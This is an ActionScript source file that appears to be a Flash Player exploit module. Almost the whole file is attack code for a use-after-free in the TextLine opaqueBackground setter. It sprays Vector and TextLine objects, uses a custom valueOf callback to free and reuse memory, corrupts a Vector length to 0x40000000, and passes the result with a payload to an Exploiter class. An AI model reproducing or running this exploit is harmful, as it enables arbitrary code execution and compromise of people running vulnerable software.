142 lines
5.1 KiB
ActionScript
Executable File
142 lines
5.1 KiB
ActionScript
Executable File
package
|
|
{
|
|
import flash.display.DisplayObjectContainer;
|
|
import flash.utils.ByteArray;
|
|
import flash.system.Capabilities;
|
|
import flash.events.MouseEvent;
|
|
import flash.external.ExternalInterface;
|
|
import flash.text.*;
|
|
import flash.text.*;
|
|
import flash.text.engine.*;
|
|
|
|
public class MyClass
|
|
{
|
|
static var
|
|
_gc:Array,
|
|
_ar:Array,
|
|
_arLen1:int,
|
|
_arLen2:int,
|
|
_arLen:int,
|
|
_vu:Vector.<uint>,
|
|
_vo:Vector.<Object>,
|
|
_tb:TextBlock,
|
|
_tl:TextLine,
|
|
_mc:MyClass,
|
|
_is64 = null,
|
|
_chrome:Boolean,
|
|
_done:Boolean,
|
|
_cnt:int,
|
|
_vLen:int,
|
|
_magic:uint = 0x123456,
|
|
LEN40:uint = 0x40000000;
|
|
|
|
static function valueOf2()
|
|
{
|
|
try
|
|
{
|
|
if (++_cnt < _arLen2) {
|
|
// recursive call for next TextLine
|
|
_ar[_cnt].opaqueBackground = _mc;
|
|
} else {
|
|
Logger.log("MyClass.valueOf2()");
|
|
|
|
// free internal objects
|
|
for(var i:int=1; i <= 5; i++)
|
|
_tb.recreateTextLine(_ar[_arLen2-i]);
|
|
|
|
// reuse freed memory
|
|
for(i=_arLen2; i < _arLen; i++)
|
|
_ar[i].length = _vLen;
|
|
}
|
|
}
|
|
catch (e:Error)
|
|
{
|
|
Logger.log("valueOf2 " + e.toString());
|
|
}
|
|
return _vLen+8;
|
|
}
|
|
|
|
static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray)
|
|
{
|
|
try
|
|
{
|
|
// init vars
|
|
Logger.log("init vars")
|
|
_arLen1 = 10 * 3; // 10 vectors per page
|
|
_arLen2 = _arLen1 + 4 * 4; // 4 TextLine per page
|
|
_arLen = _arLen2 + 10 * 8;
|
|
_ar = new Array(_arLen);
|
|
if (!_gc) _gc = new Array();
|
|
_gc.push(_ar);
|
|
if (!_tb) {
|
|
_tb = new TextBlock(new TextElement("TextElement", new ElementFormat()));
|
|
if (!_tb) throw new Error("_tb = " + _tb);
|
|
}
|
|
_mc = new MyClass();
|
|
_vLen = 400/4-2;
|
|
|
|
// fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)
|
|
Logger.log("fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)")
|
|
for(var i:int; i < _arLen1; i++)
|
|
_ar[i] = new Vector.<uint>(_vLen);
|
|
|
|
// prepare Vector objects
|
|
Logger.log("prepare Vector objects")
|
|
for(i=_arLen2; i < _arLen; i++){
|
|
_ar[i] = new Vector.<uint>(8);
|
|
_ar[i][0] = i;
|
|
}
|
|
|
|
// prepare TextLines
|
|
Logger.log("prepare TextLines")
|
|
for(i=_arLen1; i < _arLen2; i++)
|
|
_ar[i] = _tb.createTextLine();
|
|
// fill 1016-byte holes (0x38c is a size of internal TextLine object)
|
|
Logger.log("fill 1016-byte holes (0x38c is a size of internal TextLine object)")
|
|
for(i=_arLen1; i < _arLen2; i++)
|
|
_ar[i].opaqueBackground = 1; // alloc 1016 bytes
|
|
|
|
// set custom valueOf() for _mc
|
|
Logger.log("set custom valueOf() for _mc")
|
|
MyClass.prototype.valueOf = valueOf2;
|
|
|
|
// here we go, call the vulnerable setter
|
|
Logger.log("here we go, call the vulnerable setter")
|
|
_cnt = _arLen2-6;
|
|
_ar[_cnt].opaqueBackground = _mc;
|
|
|
|
// find corrupted vector length
|
|
Logger.log("find corrupted vector length ")
|
|
for(i=_arLen2; i < _arLen; i++) {
|
|
_vu = _ar[i];
|
|
if (_vu.length > _vLen+2) {
|
|
Logger.log("ar["+i.toString()+"].length = " + _vu.length.toString(16));
|
|
Logger.log("ar["+i.toString()+"]["+_vLen.toString(16)+"] = " + _vu[_vLen].toString(16));
|
|
if (_vu[_vLen] == _vLen) {
|
|
// corrupt next vector
|
|
_vu[_vLen] = LEN40;
|
|
// get corrupted vector
|
|
_vu = _ar[_vu[_vLen+2]];
|
|
break;
|
|
}
|
|
};// else CheckCorrupted(_vu, i); // 4RnD
|
|
}
|
|
|
|
// check results
|
|
Logger.log("v.length = " + _vu.length.toString(16));
|
|
if (_vu.length < LEN40) throw new Error("try again");
|
|
|
|
var exploiter:Exploiter = new Exploiter(e, platform, os, payload, _vu, 0x62)
|
|
|
|
// clean up
|
|
Logger.log("_vu.length = " + _vu.length.toString(16));
|
|
}
|
|
catch (e:Error)
|
|
{
|
|
Logger.log("TryExpl " + e.toString());
|
|
}
|
|
}
|
|
|
|
}
|
|
|
|
} |